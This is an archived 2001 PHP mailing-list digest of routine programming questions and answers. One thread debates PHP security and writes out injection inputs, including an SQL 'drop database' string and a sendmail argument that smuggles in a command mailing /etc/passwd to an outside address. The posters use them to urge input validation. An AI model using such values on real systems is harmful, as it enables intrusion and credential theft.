NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > PHP Discussion Digest> 2001-12

From: php-general-digest-helplists.php.net
Date: Fri Dec 21 2001 - 06:06:15 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

php-general Digest 21 Dec 2001 12:06:15 -0000 Issue 1065

Topics (messages 78369 through 78446):

Re: Global Arrays ?
        78369 by: Bogdan Stancescu
        78370 by: Jason Rennie
        78375 by: Philip Hallstrom
        78377 by: Bogdan Stancescu
        78385 by: Philip Hallstrom

Re: How can I have CVS ?
78371 by: jimphp.bend.com
78382 by: Michael Sims

Preg Match
78372 by: phantom

Number Format
        78373 by: phantom
        78374 by: Bogdan Stancescu
        78376 by: Philip Hallstrom
        78378 by: Steve Edberg

Bookmarking pages
78379 by: Jason Rennie

Re: Help with Sessions - Should be easy =]
78380 by: Michael Sims
78440 by: Tim Ward

Mommy, is it true that...?
        78381 by: Bogdan Stancescu
        78384 by: Michael Sims
        78386 by: Philip Hallstrom
        78388 by: Michael Sims
        78389 by: Philip Hallstrom
        78391 by: Bogdan Stancescu
        78392 by: Joelmon2001.aol.com
        78393 by: Bogdan Stancescu
        78394 by: Michael Sims
        78395 by: Bogdan Stancescu
        78397 by: Michael Sims
        78398 by: Martin Towell
        78399 by: Billy Harvey
        78400 by: Michael Sims
        78401 by: Martin Towell

Re: Number Format]
78383 by: Bogdan Stancescu

Positioning HTML output in browser window
        78387 by: Leland
        78390 by: Bogdan Stancescu
        78407 by: Ken

Algorithm: Limiting Large Numbers of Pages to 10 visible
        78396 by: Lara J. Fabans
        78405 by: Manuel Lemos
        78439 by: Dimitris Kossikidis

Re: How to save the "result page" generated by a Form?
78402 by: Webleycity
78404 by: Martin Towell

COMEDY FORUM
78403 by: Webleycity

PRINT FROM A DATABASE to a printer?
78406 by: Webleycity

embed pdf.
78408 by: Webleycity

Multiple JavaScript Windows with PHP
        78409 by: Carlos Fernando Scheidecker Antunes
        78410 by: Martin Towell
        78415 by: Carlos Fernando Scheidecker Antunes

Beginner question?
        78411 by: jtjohnston
        78412 by: Martin Towell
        78413 by: Michael Sims
        78422 by: jtjohnston
        78425 by: jtjohnston

Re: Suggestions for the next php
        78414 by: Vincent Stoessel
        78416 by: Manuel Lemos
        78419 by: Vincent Stoessel

Re: Error while calling a function--Thanks
78417 by: J.F.Kishor

Re: How to check if a session exists
78418 by: Peter J. Schoenster

mail function
        78420 by: Peter
        78423 by: jtjohnston
        78424 by: jtjohnston
        78428 by: Peter

arrays
78421 by: php dood
78435 by: Jerry Verhoef (UGBI)

Re: php telnet
78426 by: Thies C. Arntzen

JavaScript Windows with PHP
78427 by: Carlos Fernando Scheidecker Antunes

Can it be improved upon?
78429 by: jtjohnston

sessions
78430 by: Daniel Masur

Standard output (printf) question...
        78431 by: Paul H. Breslin
        78432 by: Richard Black
        78433 by: Paul H. Breslin

FrameSet Problem with PHP, Pls Help!
78434 by: Jack

sessions and authentication
78436 by: Steve Maroney

Problem with Getting Values from Cookie
78437 by: Jack

QuickTime movie size
78438 by: Kerem Ozen

Cookie Can't Display Name on other page
78441 by: Jack

Re: PHP / SSL
78442 by: TD - Sales International Holland B.V.
78446 by: Jerry Verhoef (UGBI)

Sendemail appends domain to mail function
78443 by: Peter
78445 by: Alex Vargas

page has expired
78444 by: Peter

Administrivia:

To subscribe to the digest, e-mail:
php-general-digest-subscribelists.php.net

To unsubscribe from the digest, e-mail:
php-general-digest-unsubscribelists.php.net

To post to the list, e-mail:
php-generallists.php.net

----------------------------------------------------------------------

attached mail follows:

The first thing that comes to mind - if you say it's working with local variables
- is trying to set it local prior to using it (i.e. insert a
"$loc_months=$g_months" just below "global $g_months" and use the local variable
from then on).

It may be a bug in your PHP - walking an array with each probably sets some
internal position marker which may be buggy for your very situation (global
variable in local function - something like that).

Bogdan

Jason Rennie wrote:

> > Sounds quite odd - you may try an "echo(serialize($g_months))" in the
> > function and see what you get... It may be that the code generating the
> > option box has problems - this way you make sure $g_months is empty indeed.
>
> Thanks for that. IT appears to be a problem with the function itself, as
> the array is full of stuff.
>
> I guess the next question is, what am i doing wrong here, that lets it
> work with a local array but not a global one ?
>
> function html_option_months($selected_month) {
>
> global $g_months;
> echo(serialize($g_months));
> $result = "";
> while (list($key, $val) = each($g_months)) {
> $result .= html_option($key,$val, ($selected_month == $key));
> }
> return $result;
> }
>
> Jason
>
> --
> Hofstadter's Law : "It always takes longer than you expect, even when you
> take Hofstadter's Law into account."
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, e-mail: php-general-unsubscribelists.php.net
> For additional commands, e-mail: php-general-helplists.php.net
> To contact the list administrators, e-mail: php-list-adminlists.php.net

attached mail follows:

> It may be a bug in your PHP - walking an array with each probably sets some
> internal position marker which may be buggy for your very situation (global
> variable in local function - something like that).

Thanks for that. I tried it with foreach and it works now.

Jason

-- Hofstadter's Law : "It always takes longer than you expect, even when you take Hofstadter's Law into account."

attached mail follows:

Add a reset($g_months) right before your while(...) statement.

On Fri, 21 Dec 2001, Jason Rennie wrote:

> > Sounds quite odd - you may try an "echo(serialize($g_months))" in the > > function and see what you get... It may be that the code generating the > > option box has problems - this way you make sure $g_months is empty indeed. > > Thanks for that. IT appears to be a problem with the function itself, as > the array is full of stuff. > > I guess the next question is, what am i doing wrong here, that lets it > work with a local array but not a global one ? > > function html_option_months($selected_month) { > > global $g_months; > echo(serialize($g_months)); > $result = ""; > while (list($key, $val) = each($g_months)) { > $result .= html_option($key,$val, ($selected_month == $key)); > } > return $result; > } > > Jason > > -- > Hofstadter's Law : "It always takes longer than you expect, even when you > take Hofstadter's Law into account." > > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, e-mail: php-general-unsubscribelists.php.net > For additional commands, e-mail: php-general-helplists.php.net > To contact the list administrators, e-mail: php-list-adminlists.php.net >

attached mail follows:

Why is this needed in this case an not for local variables? You probably are right, I don't imply you aren't, but why is a reset needed in local scope when using global variables? Is it possible to start an each() in a function and continue it in another for global arrays?

Philip Hallstrom wrote:

> Add a reset($g_months) right before your while(...) statement.

attached mail follows:

I don't think it has to do with local/global variables... it's more likely that he's already looped through a global array in which case the next call to each() will fail because it's already at the end.

On Fri, 21 Dec 2001, Bogdan Stancescu wrote:

> Why is this needed in this case an not for local variables? You probably are right, > I don't imply you aren't, but why is a reset needed in local scope when using > global variables? Is it possible to start an each() in a function and continue it > in another for global arrays? > > Philip Hallstrom wrote: > > > Add a reset($g_months) right before your while(...) statement. > > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, e-mail: php-general-unsubscribelists.php.net > For additional commands, e-mail: php-general-helplists.php.net > To contact the list administrators, e-mail: php-list-adminlists.php.net >

attached mail follows:

get a linux box and run secureCRT. :)

Jim

> > > and log to it from windows ?

attached mail follows:

At 10:19 AM 12/20/2001 -0800, Nathan Cassano wrote:

>And the answer is... WinCVS > >Check it our at. >http://www.cvsgui.org/

And don't forget TortoiseCVS.

http://www.cvsgui.org/TortoiseCVS/index.shtml

attached mail follows:

I am passing a string and making sure all the characters in that string are valid.

Example: For a persons age I am using:

if (!preg_match("/^[0-9]+$/", $Age)) echo "Please Enter numeric value for age".

But how would I include the following characters as permissible in preg match

~!#$%^&*()-=_+,.?/\|{}[]

since some of these characters have special meaning in PCRE regrex syntax??

attached mail follows:

I would like to format numbers to be a fixed width.

I want all numbers to be 2 characters in width to the left of the decimal point.

1 should be 01 2 should be 02 3 should be 03

How can I do this?

attached mail follows:

if ($i<10) { $i="0".$i } ? :-)

phantom wrote:

> I would like to format numbers to be a fixed width. > > I want all numbers to be 2 characters in width to the left of the > decimal point. > > 1 should be 01 > 2 should be 02 > 3 should be 03 > > How can I do this? > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, e-mail: php-general-unsubscribelists.php.net > For additional commands, e-mail: php-general-helplists.php.net > To contact the list administrators, e-mail: php-list-adminlists.php.net

attached mail follows:

Like the other guy said or take a look at the sprintf() function.

On Thu, 20 Dec 2001, phantom wrote:

> I would like to format numbers to be a fixed width. > > I want all numbers to be 2 characters in width to the left of the > decimal point. > > 1 should be 01 > 2 should be 02 > 3 should be 03 > > How can I do this? > > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, e-mail: php-general-unsubscribelists.php.net > For additional commands, e-mail: php-general-helplists.php.net > To contact the list administrators, e-mail: php-list-adminlists.php.net >

attached mail follows:

Or http://www.php.net/manual/en/function.sprintf.php or http://www.php.net/manual/en/function.printf.php

At 04:45 PM 12/20/01 , Bogdan Stancescu <mgvfx.ro> wrote: >if ($i<10) { $i="0".$i } ? :-) > >phantom <phantomphantomcougar.com> wrote: > > > I would like to format numbers to be a fixed width. > > > > I want all numbers to be 2 characters in width to the left of the > > decimal point. > > > > 1 should be 01 > > 2 should be 02 > > 3 should be 03 > > > > How can I do this? > >

+------------------------------------------------------------------------+ | Steve Edberg sbedbergucdavis.edu | | Database/Programming/SysAdmin (530)754-9127 | | University of California, Davis http://pgfsun.ucdavis.edu/ | +---------------------- Gort, Klaatu barada nikto! ----------------------+

attached mail follows:

Hi all, again,

I need to be able to have working bookmarkable pages in a system.

The user has session ID's which have to time out, so when they do the user is kicked out of the system.

But i've been asked to set it up so that after a user gets kicked to a login screen becasue they have an expired/invalid session id, to let them go back to the page they where on before getting booted.

No all of the non-session id variables will be in the $HTTP_GET_VARS array (right ?), but how do I get the file that the user has just come from ?

Jason

-- Hofstadter's Law : "It always takes longer than you expect, even when you take Hofstadter's Law into account."

attached mail follows:

At 01:53 AM 12/21/2001 +1100, Tomasz Jachimczak wrote: >I am retreiving user information from a database after verification, and >would like to place certain feilds into a session variable for easy >access/retreival. I can get the information out of the database, but cannot >place it into any sort of variable that will store on the page.

Why would you want to? If the information you need is available in your database, why not query the database for it on each page you need to reference this data? It seems kind of strange to me to take data you have in one server-side information store (the db) and move it into another (a server-side session cookie)...the overhead to get the info out should be the same both ways.

Now that is assuming that you aren't already using session variables for something else. If you are then I could understand a little better.

Either way, you'll need to provide a few more details about what you've tried and what your experiences have been before anyone will be able to help you... You haven't really described your problem beyond saying that you cannot get it to work. Have you registered your variable with session_register()? Have you started the session with session_start() on the pages you need to access this variable?

attached mail follows:

session_register("sessionvar");

you can now assign values to $sessionvar (or whatever you've chosen to call it). You need to register each variable and start the session at the top of each script.

In practice it's a lot easier if you hold all your session stuff under a single hash array, that way you only need to do 1 session_register and you don't have to worry about post/get variable names clashing with session variables.

If this doesn't work look at your track_vars and register_globals settings. See http://www.php.net/manual/en/ref.session.php <http://www.php.net/manual/en/ref.session.php> .

Tim Ward www.chessish.com <http://www.chessish.com>

---------- From: Tomasz Jachimczak [SMTP:tomaszplanetunreal.com] Sent: 20 December 2001 14:53 To: php-generallists.php.net Subject: Help with Sessions - Should be easy =]

I am coming from an asp background, and am used to setting session variables very easily, but I cannot work them out here with all the different commands.

I would like to store in a session variable output from a mysql db (Got the db bit working fine) but cannot for the life of me store or retrieve anything from a session variable.

(more information if required)

I am retreiving user information from a database after verification, and would like to place certain feilds into a session variable for easy access/retreival. I can get the information out of the database, but cannot place it into any sort of variable that will store on the page.

I have the latest official PHP, running with IIS on a Windows 2K server with IIS.

More questions to follow no doubt,

Thanks in advance,

- Tomasz

attached mail follows:

Hi everybody!

Two things I consider urban myths about PHP (plus MySQL) - please let me know what you think of these:

1. The evil global variables

Ok, the classic <? if ($pwd=="GOODPASSWORD") { $lethimin=1; } [bullshit code] if ($lethimin) { echo(fread(fopen("/etc/passwd","r"))); } ?> is obviously valid. But let's be serious, who codes this? The example code is valid and it's easily crackable indeed, but you don't do that kind of thing - you do it in one step. Even if you really need the bullshit code in there for some obscure reason, this is the log in code damnit, anybody takes care of that!

Why I raised this issue is because I think people tend to get paranoid about PHP. And that happens in both worlds - customers and developers. Nothing to say about customers, I'd be careful too if I heard some dude got intoxicated at a McDonald's in Bogota. My problem is with developers - they got it in their head that variables are your enemy and initialize everything nowadays - including local variables!

My question to you guys is this: does anybody know of a real example of reasonably careful coding led to disaster with global variables?

2. Please enter your age: 25; drop database mysql

Does this actually work?

I've read at least a dozen articles telling people to get it in their blood not to trust users and addslashes to any king incoming data, as well as pass it as strings to mysql ("insert into person set age='$age'" instead of "insert into person set age =$age).

So I decided I had to test this: I wrote the code exactly as in the example; I provided the exact dangerous input (well, to be honest, I tried a select instead of drop mysql). When I tried it, the presumably dangerous situation degraded into a trivial MySQL error. It went something like "You have an error near '; select 1+1'".

Did you ever actually try this? Does it work on your system?

Thanks in advance for the input!

Bogdan

attached mail follows:

At 03:39 AM 12/21/2001 +0200, Bogdan Stancescu wrote: >Hi everybody! > >Two things I consider urban myths about PHP (plus MySQL) - please let me >know what you think of these: > >1. The evil global variables [...] >My question to you guys is this: does anybody know of a real example of >reasonably careful coding led to disaster with global variables?

I personally don't, but apparently the PHP developers think it's enough of a risk that they've deprecated register_globals in 4.1.0...

>2. Please enter your age: 25; drop database mysql > >Does this actually work? [...] >So I decided I had to test this: I wrote the code exactly as in the >example; I provided the exact dangerous input (well, to be honest, I >tried a select instead of drop mysql). When I tried it, the presumably >dangerous situation degraded into a trivial MySQL error. It went >something like "You have an error near '; select 1+1'".

I've done something similar in the past just for kicks, and I got the same result you did (i.e. an error). I believe this is because mysql_query() expects ONE query at a time and will break if you send two or more. I could be completely and totally wrong about that, though (someone please correct me if I am)...

attached mail follows:

> >2. Please enter your age: 25; drop database mysql > > > >Does this actually work? > [...] > >So I decided I had to test this: I wrote the code exactly as in the > >example; I provided the exact dangerous input (well, to be honest, I > >tried a select instead of drop mysql). When I tried it, the presumably > >dangerous situation degraded into a trivial MySQL error. It went > >something like "You have an error near '; select 1+1'". > > I've done something similar in the past just for kicks, and I got the same > result you did (i.e. an error). I believe this is because mysql_query() > expects ONE query at a time and will break if you send two or more. I > could be completely and totally wrong about that, though (someone please > correct me if I am)...

Maybe this one failed, but it's always a good idea to check user input. Let's say you're emailing a form and you don't use the mail() function, but make a call directly to sendmail... and you're sloppy... so you do this:

$fp = fopen("|/usr/bin/sendmail $sendto"); #write stuff to pipe to send email...

Now... what if when I filled out the form I set $sendto equal to this:

philipadhesivemedia.com; /usr/bin/mail philipadhesivemedia.com < /etc/passwd

You're form will still work, but I'll also get your password file... This used to happen *a lot* back in the early CGI days...

This is why they recommend checking all user input and initializing variables...

-philip

attached mail follows:

At 06:03 PM 12/20/2001 -0800, Philip Hallstrom wrote: > > I've done something similar in the past just for kicks, and I got the same > > result you did (i.e. an error). I believe this is because mysql_query() > > expects ONE query at a time and will break if you send two or more. I > > could be completely and totally wrong about that, though (someone please > > correct me if I am)... > >Maybe this one failed, but it's always a good idea to check user input. >Let's say you're emailing a form and you don't use the mail() function, >but make a call directly to sendmail... and you're sloppy... so you do >this: [...]

True. But we were speaking specifically about MySQL. When you start toying with external programs and exec() and so forth then you've opened up a whole other can of worms security-wise...

>$fp = fopen("|/usr/bin/sendmail $sendto"); >#write stuff to pipe to send email... > >Now... what if when I filled out the form I set $sendto equal to this: > >philipadhesivemedia.com; /usr/bin/mail philipadhesivemedia.com < /etc/passwd

A definite possibility, but it does depend on the hacker in question knowing exactly how your script is written...

attached mail follows:

> At 06:03 PM 12/20/2001 -0800, Philip Hallstrom wrote: > > > I've done something similar in the past just for kicks, and I got the same > > > result you did (i.e. an error). I believe this is because mysql_query() > > > expects ONE query at a time and will break if you send two or more. I > > > could be completely and totally wrong about that, though (someone please > > > correct me if I am)... > > > >Maybe this one failed, but it's always a good idea to check user input. > >Let's say you're emailing a form and you don't use the mail() function, > >but make a call directly to sendmail... and you're sloppy... so you do > >this: > [...] > > True. But we were speaking specifically about MySQL. When you start > toying with external programs and exec() and so forth then you've opened up > a whole other can of worms security-wise...

True, but why take the chance? :) I didn't see an equivalent for MySQL, but PostgreSQL has a pg_put_line() which just sends a NULL terminated string to the backend so you can do whatever you want (ie. multi statement). So in that case things could get messed up.

> > >$fp = fopen("|/usr/bin/sendmail $sendto"); > >#write stuff to pipe to send email... > > > >Now... what if when I filled out the form I set $sendto equal to this: > > > >philipadhesivemedia.com; /usr/bin/mail philipadhesivemedia.com < /etc/passwd > > A definite possibility, but it does depend on the hacker in question > knowing exactly how your script is written...

True, but in a shared hosting environment this is very likely.

-philip

attached mail follows:

Philip Hallstrom wrote:

> > A definite possibility, but it does depend on the hacker in question > > knowing exactly how your script is written... > > True, but in a shared hosting environment this is very likely.

...not to mention open source code. However, the discussion was indeed oriented towards MySQL. Hoever (again), the exec() argument is indeed something worth mentioning - I now realize there may be some serious security holes in an open-source project I'm currently woking on (ouch!)

Bogdan

attached mail follows:

how does one prevent a hacker deleting tables or what not?

This is a topic I do not know enough about, thanks for opening my eyes to this matter

joel

attached mail follows:

Well, the official point is rather obvious from my original e-mail. What I personally do is either forget about it -- again, see the original e-mail -- or, if for some reason high security is needed, I simply add 0 (zero) to numeral input fields and addslashes to strings.

Bogdan

Joelmon2001aol.com wrote:

> how does one prevent a hacker deleting tables or what not? > > This is a topic I do not know enough about, thanks for opening my eyes to > this matter > > joel

attached mail follows:

At 04:26 AM 12/21/2001 +0200, Bogdan Stancescu wrote: >Philip Hallstrom wrote: > > > > A definite possibility, but it does depend on the hacker in question > > > knowing exactly how your script is written... > > > > True, but in a shared hosting environment this is very likely. > >...not to mention open source code.

Oh yeah. Guess I had a mental lapse there. If you are using, say, a script downloaded from freshmeat.net and it happens to be poorly secured then obviously the entire free world is going to know how to exploit your copy of it....duh....

attached mail follows:

> > > True, but in a shared hosting environment this is very likely. > > > >...not to mention open source code. > > Oh yeah. Guess I had a mental lapse there. If you are using, say, a > script downloaded from freshmeat.net and it happens to be poorly secured > then obviously the entire free world is going to know how to exploit your > copy of it....duh....

Actually that's exactly what I had in mind. Heck, if your point is that they don't know your URL then what's the point in the whole security issue anyways?

attached mail follows:

At 04:51 AM 12/21/2001 +0200, Bogdan Stancescu wrote: > > > > True, but in a shared hosting environment this is very likely. > > > > > >...not to mention open source code. > > > > Oh yeah. Guess I had a mental lapse there. If you are using, say, a > > script downloaded from freshmeat.net and it happens to be poorly secured > > then obviously the entire free world is going to know how to exploit your > > copy of it....duh.... > >Actually that's exactly what I had in mind. Heck, if your point is that they >don't know your URL then what's the point in the whole security issue anyways?

I'm sorry, you've lost me. When did the question of knowing URLs come into this? I was referring to a hacker having access to your PHP script source.

Freshmeat.net is a very popular database of linux software and includes a wide variety of PHP scripts. My point was that if you downloaded an insecure script from such a popular site then you are asking for trouble because chances are thousands of would-be hackers have ALSO downloaded the same script and have familiarized themselves with ways that it can be exploited...

attached mail follows:

My 2c worth...

IMO, If you download a script and just blindly copy it to your system, then you're just asking for trouble, period - I think you should ALWAYS check code for anything that could be malicious and also check for any loopholes that need to be closed before using it. This might mean changing the names of variables/functions or rewriting some of the code entirely.

I don't trust any code that people send me, I always check it first, if possible...

-----Original Message----- From: Michael Sims [mailto:mhsimsmidsouth.rr.com] Sent: Friday, December 21, 2001 3:20 PM To: php-generallists.php.net Subject: Re: [PHP] Re: Mommy, is it true that...?

I'm sorry, you've lost me. When did the question of knowing URLs come into this? I was referring to a hacker having access to your PHP script source.

-- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: php-general-unsubscribe

lists.php.net For additional commands, e-mail: php-general-help

lists.php.net To contact the list administrators, e-mail: php-list-admin

lists.php.net

attached mail follows:

> Freshmeat.net is a very popular database of linux software and includes a > wide variety of PHP scripts. My point was that if you downloaded an > insecure script from such a popular site then you are asking for trouble > because chances are thousands of would-be hackers have ALSO downloaded the > same script and have familiarized themselves with ways that it can be > exploited...

So would you rather just use pre-compiled binaries from some company that says "trust me"?

You're responsible for the code on your site. If it's open-source one at least has a fighting chance of examining it. If it's too complex for someone to understand, then they shouldn't use it.

Billy

attached mail follows:

At 11:28 PM 12/20/2001 -0500, Billy Harvey wrote: > > Freshmeat.net is a very popular database of linux software and includes a > > wide variety of PHP scripts. My point was that if you downloaded an > > insecure script from such a popular site then you are asking for trouble > > because chances are thousands of would-be hackers have ALSO downloaded the > > same script and have familiarized themselves with ways that it can be > > exploited... > >So would you rather just use pre-compiled binaries from some company >that says "trust me"?

Sigh. No. The thread has meandered quite a bit, and you'd have to read the whole thing to see how we got to this point. To summarize:

Someone made the point that you should always carefully check user submitted data, and provided an example using an poorly secured fopen() statement whereby a hacker could gain access to /etc/passwd. I responded by saying that to do such a thing the hacker would have to know exactly how your code is written. Someone else responded saying that this was indeed likely in shared hosting environments or open source software. The above is me agreeing and saying "oh I didn't think of that" Nowhere did I say that I think this is a disadvantage of OSS.

If you wish to extrapolate an argument from what I wrote above then here's a good one: When you install software that could be a potential security risk then you should attempt to use well established, peer-reviewed OPEN SOURCE software and ideally review at the code yourself to make sure it meets your standards of security and doesn't contain any nasty exploits.

See, I'm one of the good guys...a dot communist, just like you. ;-)

attached mail follows:

another 2c worth...

So it's the programmer's responsibility to ensure all his/her code is as secure as possible. If it can be shown that it isn't secure, then the programmer should endevour to close that hole.

This goes for any area that hackers can exploit, software and hardware...

-----Original Message----- From: Michael Sims [mailto:mhsimsmidsouth.rr.com] Sent: Friday, December 21, 2001 3:43 PM To: php-generallists.php.net Subject: Re: [PHP] Re: Mommy, is it true that...?

Sigh. No. The thread has meandered quite a bit, and you'd have to read the whole thing to see how we got to this point. To summarize:

See, I'm one of the good guys...a dot communist, just like you. ;-)

-- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: php-general-unsubscribe

lists.php.net For additional commands, e-mail: php-general-help

lists.php.net To contact the list administrators, e-mail: php-list-admin

lists.php.net

attached mail follows:

Inadvertedly sent to me:

Bas van Rooijen wrote:

> sprintf("%02d", $i); > > but you should indeed check out how this function works.. > > >phantom wrote: > > > >> I would like to format numbers to be a fixed width.

attached mail follows:

Hi Folks,

I have a script that outputs a large data list to the web browser. When the user clicks the link for a particular data item they are taken to a new script to modify the record and then when the post the changes they are taken back to the original data list. (no problem so far)

What I want is that when they return to the original data list it is positioned on the record they just modified. What happens is that the list is positioned at the top of the list.

I tried generating a <A NAME=lastpos></A> in the orginal list, but I haven't been able to create the return link on the other page that will refrence this. I tried <A HREF=myscript.php#lastpos?cat=$cat>Link</A> but it doesn't work.

Any ideas?

-- Leland Foster

attached mail follows:

Well, you can always code in a little Javascript, such as "window.location='#lastpos'"...

Leland wrote:

> I tried generating a <A NAME=lastpos></A> in the orginal list, but I haven't > been able to create the return link on the other page that will refrence > this. I tried <A HREF=myscript.php#lastpos?cat=$cat>Link</A> but it doesn't > work. > > Any ideas?

attached mail follows:

At 06:59 PM 12/20/01 -0700, Leland wrote: >I tried generating a <A NAME=lastpos></A> in the orginal list, but I haven't >been able to create the return link on the other page that will refrence >this. I tried <A HREF=myscript.php#lastpos?cat=$cat>Link</A> but it doesn't >work.

Did you try <a href="myscript.php?cat=$cat#lastpos">Link</a> ?

From RFC 2396, "Uniform Resource Identifiers (URI): Generic Syntax":

URI-reference = [ absoluteURI | relativeURI ] [ "#" fragment ] absoluteURI = scheme ":" ( hier_part | opaque_part ) relativeURI = ( net_path | abs_path | rel_path ) [ "?" query ]

And don't leave out the quotes, either.

- Ken kenzofree-music.com

attached mail follows:

Hi,

I need an algorithm for paging. If I have 100 pages of results, I only want to show << Prev 1 2 3 4 5 6 7 8 9 10 Next >>

Where I limit the number to 10 results of pages, but I cannot figure it out for the life of me. for ($i = $page; $i <= ($page+10); $i++) { if ($i != $page) { echo " <a href=\"$PHP_SELF?catid=$catid&page=$i\">$i</a> "; } else { echo " $i "; }

} echo " <a href=\"$PHP_SELF?catid=$catid&page=$i\">>></a> "; echo " <a href=\"$PHP_SELF?catid=$catid&page=$num_pages\">End</a> "; }

But what I need to do is not show pages that aren't there, and I'm hardwiring it to show 10 whether they exist or not.

I've got to believe that there's a really slick way of doing this. I've searched the usual places (weberdev.com, devshed.com, zend.com) but there's no really good keywords, and when you search on 'paging" you get too many results to be useful

Thanks in advance, Lara --------------------- Lara J. Fabans Lodestone Software, Inc laralodestone-sw.com

attached mail follows:

Hello,

> I've got to believe that there's a really slick way of doing this. I've > searched the usual > places (weberdev.com, devshed.com, zend.com) but there's no really good > keywords, > and when you search on 'paging" you get too many results to be useful

http://phpclasses.upperdesign.com/browse.html/package/130

Regards, Manuel Lemos

attached mail follows:

Or you can use this simply class from Manuel Lemos's site. It works with Mysql only. http://phpclasses.upperdesign.com/browse.html/package/366

> Hi, > > I need an algorithm for paging. If I have 100 pages of results, I only > want to show > << Prev 1 2 3 4 5 6 7 8 9 10 Next >> > > Where I limit the number to 10 results of pages, but I cannot figure it out > for the life of me. > for ($i = $page; $i <= ($page+10); $i++) { > if ($i != $page) { > echo " <a href=\"$PHP_SELF?catid=$catid&page=$i\">$i</a> "; > } else { > echo " $i "; > } > > } > echo " <a href=\"$PHP_SELF?catid=$catid&page=$i\">>></a> "; > echo " <a href=\"$PHP_SELF?catid=$catid&page=$num_pages\">End</a> "; > } > > > > But what I need to do is not show pages that aren't there, and I'm > hardwiring it to show > 10 whether they exist or not. > > I've got to believe that there's a really slick way of doing this. I've > searched the usual > places (weberdev.com, devshed.com, zend.com) but there's no really good > keywords, > and when you search on 'paging" you get too many results to be useful > > Thanks in advance, > Lara > --------------------- > Lara J. Fabans > Lodestone Software, Inc > laralodestone-sw.com > > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, e-mail: php-general-unsubscribelists.php.net > For additional commands, e-mail: php-general-helplists.php.net > To contact the list administrators, e-mail: php-list-adminlists.php.net >

attached mail follows:

When one sends an email to an address in PHP, does any one out there no how to send to two or more email addresses.

------------------------------------------- Mark Webley Multimedia design and development

WebleyCity Limited London United Kingdom

markwebleycity.co.uk mark.webleypsion.net Mobile: 07980 213 627

Fax/Tel: 0208 678 1721 Pager 07654 581816 http://www.webleycity.co.uk -------------------------------------------

> From: "Stefan Rusterholz" <scriptinginteraktion.ch> > Organization: interaktion > Reply-To: "Stefan Rusterholz" <scriptinginteraktion.ch> > Date: Thu, 20 Dec 2001 11:11:28 +0100 > To: "Joe" <joescatin.it> > Cc: "PHP" <php-generallists.php.net> > Subject: Re: [PHP] How to save the "result page" generated by a Form? > > I don't know if it matches your needs but perhaps it helps: > http://www.php.net/manual/en/ref.outcontrol.php > http://www.php.net/manual/it/ref.outcontrol.php this page isn't translated, > but perhaps some subpages... > > good luck > Stefan Rusterholz > > ----- Original Message ----- > From: "Joe" <joescatin.it> > To: <php-generallists.php.net> > Sent: Thursday, December 20, 2001 10:38 AM > Subject: [PHP] How to save the "result page" generated by a Form? > > >> -----BEGIN PGP SIGNED MESSAGE----- >> Hash: SHA1 >> >> I have a simple question. >> My Scenario: >> Page a.php - The Form >> The user insert his data (ie name, address, city and so on...)Then he >> submit the $ to b.php. >> >> Page b.php now shows : >> Hello Mr. $name , etc etc ... >> I nedd now to save what I see on the sreen as .txt or .rft or .html .... >> How can I do that? >> I try many ways ...(using no session) ..but I can only save the empty >> b.php page ...with no varialbles showed at all. >> >> Thanx for your help and Marry XMas from Italy. >> >> BR >> Joe >> >> -----BEGIN PGP SIGNATURE----- >> Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com> >> Comment: ID: 0x0A17124F - DH/DSS 2048/1024 - Joe Athena Webmaster >> >> iQA/AwUBPCGxOET82/4KFxJPEQK+yQCfdrsJMV6YXUxsqUxmgsTrVguHotUAn1pA >> tF+VwCUw1Cdv4k70aWtvrynp >> =GI2/ >> -----END PGP SIGNATURE----- >> >> >> >> >> -- >> PHP General Mailing List (http://www.php.net/) >> To unsubscribe, e-mail: php-general-unsubscribelists.php.net >> For additional commands, e-mail: php-general-helplists.php.net >> To contact the list administrators, e-mail: php-list-adminlists.php.net >> >> >> > > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, e-mail: php-general-unsubscribelists.php.net > For additional commands, e-mail: php-general-helplists.php.net > To contact the list administrators, e-mail: php-list-adminlists.php.net > >

attached mail follows:

separate the email address with, can remember which now, either a comma or a semicolon - try one, if it does work, it must be the other :)

-----Original Message----- From: Webleycity [mailto:webleycityukonline.co.uk] Sent: Friday, December 21, 2001 3:52 PM To: Stefan Rusterholz; Joe Cc: PHP Subject: Re: [PHP] How to save the "result page" generated by a Form?

When one sends an email to an address in PHP, does any one out there no how to send to two or more email addresses.

------------------------------------------- Mark Webley Multimedia design and development

WebleyCity Limited London United Kingdom

markwebleycity.co.uk mark.webleypsion.net Mobile: 07980 213 627

Fax/Tel: 0208 678 1721 Pager 07654 581816 http://www.webleycity.co.uk -------------------------------------------

-- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: php-general-unsubscribe

lists.php.net For additional commands, e-mail: php-general-help

lists.php.net To contact the list administrators, e-mail: php-list-admin

lists.php.net

attached mail follows:

DOES ANY BODY OUT THERE KNOW OF A GOOD COMEDY FORUM? OR A FREE REAL PLAYER COMEDY CHANNE.L ALL THIS WORK CAN DRIVE A MAN MAD.

------------------------------------------- Mark Webley Multimedia design and development

WebleyCity Limited London United Kingdom

markwebleycity.co.uk mark.webleypsion.net Mobile: 07980 213 627

Fax/Tel: 0208 678 1721 Pager 07654 581816 http://www.webleycity.co.uk -------------------------------------------

